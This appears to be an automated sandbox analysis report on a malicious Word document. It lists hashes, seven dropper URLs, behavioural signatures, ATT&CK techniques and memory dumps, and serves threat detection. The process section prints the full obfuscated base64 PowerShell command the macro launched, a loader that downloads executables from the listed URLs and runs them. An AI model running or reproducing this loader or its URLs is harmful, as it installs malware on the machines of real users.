2361d0e1b933d0146c44874b661d74a11ac6152fc62a3cae8de22c8e0cc38cdb

General

Target

2361d0e1b933d0146c44874b661d74a11ac6152fc62a3cae8de22c8e0cc38cdb.doc
Size

249KB
MD5

2065664436cf97b0a80afbd14bc08023
SHA1

986b0c843ddb53b5591994f704d8466f4b36f441
SHA256

2361d0e1b933d0146c44874b661d74a11ac6152fc62a3cae8de22c8e0cc38cdb
SHA512

3c3c37dc80eafb6cae956b54c46d0aaa9e74b55824bc0163210e4511ef9223516afa08f53dd85671c2a45c5fdd419e076362fc175bd2f0e98cd59165e1079148

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://sauloramos.com.br/PLcbM/4oxcev0320/

exe.dropper

http://jurczyk.biz/piotrek/IJilgckESlY/

exe.dropper

http://lidiscom.com.br/BKP_TinaPOS/CQSMl/

exe.dropper

http://cmswrexham.com/video/N2lzhgh45/

exe.dropper

http://lyveinc.com/wp-content/uploads/attachments/XxM/

exe.dropper

https://stateinsuranceonline.com/wp-content/yQzAGwyQs/

exe.dropper

https://www.teringieestatefarms.com.au/wp-content/Lvqg/

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 776 3940 powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	776	3940	powersheLL.exe

Blocklisted process makes network request 9 IoCs

Processes:

powersheLL.exe

flow	pid	process
23	776	powersheLL.exe
25	776	powersheLL.exe
27	776	powersheLL.exe
28	776	powersheLL.exe
32	776	powersheLL.exe
34	776	powersheLL.exe
54	776	powersheLL.exe
61	776	powersheLL.exe
63	776	powersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4288 WINWORD.EXE
4288 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powersheLL.exe

pid process

776 powersheLL.exe
776 powersheLL.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 776 powersheLL.exe
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

WINWORD.EXE

pid process

4288 WINWORD.EXE
4288 WINWORD.EXE
4288 WINWORD.EXE
4288 WINWORD.EXE
4288 WINWORD.EXE
4288 WINWORD.EXE
4288 WINWORD.EXE
4288 WINWORD.EXE

pid	process
4288	WINWORD.EXE
4288	WINWORD.EXE

pid	process
776	powersheLL.exe
776	powersheLL.exe

description	pid	process
Token: SeDebugPrivilege	776	powersheLL.exe

pid	process
4288	WINWORD.EXE
4288	WINWORD.EXE
4288	WINWORD.EXE
4288	WINWORD.EXE
4288	WINWORD.EXE
4288	WINWORD.EXE
4288	WINWORD.EXE
4288	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2361d0e1b933d0146c44874b661d74a11ac6152fc62a3cae8de22c8e0cc38cdb.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4288

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABJADYAMAByAF8AaABjAD0AKAAnAEgAJwArACgAJwBlAHYAJwArACcANQA2ADYAJwApACsAJwBuACcAKQA7ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdABFAE0AcABcAHcAbwByAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQASQByAGUAQwB0AG8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABDAFUAYABSAEkAVAB5AHAAcgBgAG8AdABgAE8AYwBPAGwAIgAgAD0AIAAoACcAdAAnACsAJwBsAHMAJwArACgAJwAxADIAJwArACcALAAgACcAKQArACcAdABsACcAKwAoACcAcwAxADEAJwArACcALAAnACsAJwAgAHQAJwApACsAJwBsAHMAJwApADsAJABOAG0AcABlADkAcQB1ACAAPQAgACgAJwBQAG8AJwArACcAaABhACcAKwAnAGUAbgAnACkAOwAkAFAAaQBqAGIAeAB3ADcAPQAoACgAJwBQACcAKwAnAG0ANQBkACcAKQArACcAMwAnACsAJwBsAG8AJwApADsAJABHAGMAcAB0AG4AZgByAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAoACgAJwB7ADAAfQAnACsAKAAnAHcAbwAnACsAJwByACcAKQArACcAZAB7ADAAJwArACcAfQAyADAAMQA5AHsAJwArACcAMAB9ACcAKQAgACAALQBmACAAWwBjAGgAQQByAF0AOQAyACkAKwAkAE4AbQBwAGUAOQBxAHUAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEIAYQByAGkAaQB2AHkAPQAoACgAJwBSACcAKwAnADAAbgAnACkAKwAnAHQAdQAnACsAJwBqAHQAJwApADsAJABKAHIAbwBxAGQAdAA3AD0ALgAoACcAbgBlAHcAJwArACcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAEUAVAAuAHcARQBiAGMATABpAEUATgBUADsAJABUADEAdQB0AF8AYQBfAD0AKAAnAGgAJwArACgAJwB0ACcAKwAnAHQAcAA6ACcAKQArACcALwAvACcAKwAoACcAcwBhAHUAbAAnACsAJwBvACcAKQArACgAJwByAGEAbQBvAHMALgAnACsAJwBjACcAKwAnAG8AbQAnACsAJwAuAGIAcgAvAFAAJwArACcATAAnACsAJwBjAGIAJwApACsAJwBNACcAKwAoACcALwAnACsAJwA0AG8AeABjAGUAJwArACcAdgAwADMAJwApACsAKAAnADIAMAAnACsAJwAvACoAJwApACsAJwBoACcAKwAoACcAdAB0AHAAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGoAdQAnACsAJwByAGMAJwApACsAJwB6ACcAKwAnAHkAawAnACsAKAAnAC4AJwArACcAYgBpAHoAJwApACsAJwAvAHAAJwArACgAJwBpAG8AdAAnACsAJwByAGUAJwApACsAKAAnAGsALwBJACcAKwAnAEoAaQBsAGcAYwAnACkAKwAoACcAawBFAFMAbABZACcAKwAnAC8AKgAnACsAJwBoACcAKQArACcAdAB0ACcAKwAnAHAAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBsACcAKwAnAGkAZAAnACkAKwAnAGkAJwArACcAcwAnACsAKAAnAGMAJwArACcAbwAnACsAJwBtAC4AYwBvAG0AJwApACsAKAAnAC4AYgAnACsAJwByACcAKQArACgAJwAvAEIAJwArACcASwBQACcAKQArACgAJwBfAFQAaQAnACsAJwBuAGEAUABPAFMALwBDACcAKwAnAFEAUwBNACcAKQArACgAJwBsAC8AJwArACcAKgAnACkAKwAoACcAaAAnACsAJwB0AHQAcAA6AC8AJwApACsAKAAnAC8AYwAnACsAJwBtACcAKQArACgAJwBzAHcAJwArACcAcgBlACcAKQArACgAJwB4ACcAKwAnAGgAYQAnACkAKwAnAG0AJwArACcALgAnACsAJwBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdgBpAGQAZQAnACsAJwBvAC8AJwApACsAKAAnAE4AMgAnACsAJwBsAHoAJwApACsAJwBoACcAKwAnAGcAJwArACcAaAA0ACcAKwAoACcANQAnACsAJwAvACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAJwArACcAOgAnACkAKwAoACcALwAvAGwAJwArACcAeQAnACkAKwAnAHYAZQAnACsAKAAnAGkAbgAnACsAJwBjAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBjAG8AbgB0AGUAJwArACcAbgAnACsAJwB0ACcAKQArACcALwB1ACcAKwAoACcAcABsAG8AYQAnACsAJwBkACcAKwAnAHMAJwApACsAKAAnAC8AYQB0AHQAJwArACcAYQBjAGgAJwApACsAKAAnAG0AZQBuACcAKwAnAHQAcwAvACcAKwAnAFgAeABNAC8AKgBoACcAKwAnAHQAdAAnACkAKwAnAHAAcwAnACsAKAAnADoALwAnACsAJwAvACcAKQArACcAcwB0ACcAKwAoACcAYQAnACsAJwB0AGUAJwApACsAJwBpACcAKwAnAG4AJwArACcAcwB1ACcAKwAoACcAcgBhAG4AJwArACcAYwBlACcAKQArACgAJwBvAG4AJwArACcAbAAnACkAKwAoACcAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwAC0AJwArACcAYwAnACkAKwAnAG8AbgAnACsAKAAnAHQAZQAnACsAJwBuAHQALwB5AFEAegBBACcAKwAnAEcAJwApACsAKAAnAHcAJwArACcAeQBRAHMAJwArACcALwAqAGgAJwApACsAKAAnAHQAdABwACcAKwAnAHMAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAHcAdwAnACsAJwB3AC4AdAAnACkAKwAoACcAZQAnACsAJwByAGkAbgBnACcAKQArACcAaQAnACsAKAAnAGUAZQBzACcAKwAnAHQAJwApACsAKAAnAGEAdABlAGYAJwArACcAYQAnACkAKwAnAHIAbQAnACsAKAAnAHMALgAnACsAJwBjACcAKQArACgAJwBvAG0AJwArACcALgBhAHUALwAnACkAKwAnAHcAJwArACcAcAAnACsAKAAnAC0AJwArACcAYwBvAG4AdAAnACkAKwAnAGUAbgAnACsAJwB0ACcAKwAoACcALwBMACcAKwAnAHYAJwApACsAKAAnAHEAJwArACcAZwAvACcAKQApAC4AIgBzAHAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFoAMQBuAGoAMgBnAHAAPQAoACgAJwBLAHoAJwArACcAXwBzACcAKQArACgAJwBiADIAJwArACcAdwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEEANwBzAHAAdwBrADcAIABpAG4AIAAkAFQAMQB1AHQAXwBhAF8AKQB7AHQAcgB5AHsAJABKAHIAbwBxAGQAdAA3AC4AIgBkAG8AVwBOAEwAbwBgAEEAYABEAGYASQBsAGUAIgAoACQAQQA3AHMAcAB3AGsANwAsACAAJABHAGMAcAB0AG4AZgByACkAOwAkAEYAbgBlAGEAeQBlADgAPQAoACgAJwBPADUAJwArACcAbgAnACkAKwAoACcAeQAnACsAJwBqAG0ANwAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABHAGMAcAB0AG4AZgByACkALgAiAGwARQBgAE4ARwB0AEgAIgAgAC0AZwBlACAAMgA2ADcAOQA4ACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlAC0AJwArACcASQB0AGUAJwArACcAbQAnACkAKAAkAEcAYwBwAHQAbgBmAHIAKQA7ACQARwBkAGIAMABmAGoANwA9ACgAKAAnAEMAJwArACcANQB1AHcAJwApACsAKAAnAGYAcAAnACsAJwA4ACcAKQApADsAYgByAGUAYQBrADsAJABRAG0AZwBlAHMAOQA3AD0AKAAnAEoAegAnACsAKAAnADkANAAnACsAJwAzAGUAYwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQB5ADMAeQB1ADQAYwA9ACgAJwBHAHEAJwArACgAJwB1AGsAJwArACcAbgBvAHAAJwApACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:776

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/776-138-0x00000248967B0000-0x00000248967D2000-memory.dmp

Filesize
136KB

Download
memory/776-139-0x00007FFDFBD00000-0x00007FFDFC7C1000-memory.dmp

Filesize
10.8MB

Download
memory/4288-133-0x00007FFDE7030000-0x00007FFDE7040000-memory.dmp

Filesize
64KB

Download
memory/4288-130-0x00007FFDE7030000-0x00007FFDE7040000-memory.dmp

Filesize
64KB

Download
memory/4288-134-0x00007FFDE7030000-0x00007FFDE7040000-memory.dmp

Filesize
64KB

Download
memory/4288-135-0x00007FFDE4FD0000-0x00007FFDE4FE0000-memory.dmp

Filesize
64KB

Download
memory/4288-136-0x00007FFDE4FD0000-0x00007FFDE4FE0000-memory.dmp

Filesize
64KB

Download
memory/4288-137-0x0000013C15360000-0x0000013C15364000-memory.dmp

Filesize
16KB

Download
memory/4288-132-0x00007FFDE7030000-0x00007FFDE7040000-memory.dmp

Filesize
64KB

Download
memory/4288-131-0x00007FFDE7030000-0x00007FFDE7040000-memory.dmp

Filesize
64KB

Download
memory/4288-141-0x00007FFDE7030000-0x00007FFDE7040000-memory.dmp

Filesize
64KB

Download
memory/4288-142-0x00007FFDE7030000-0x00007FFDE7040000-memory.dmp

Filesize
64KB

Download
memory/4288-143-0x00007FFDE7030000-0x00007FFDE7040000-memory.dmp

Filesize
64KB

Download
memory/4288-144-0x00007FFDE7030000-0x00007FFDE7040000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads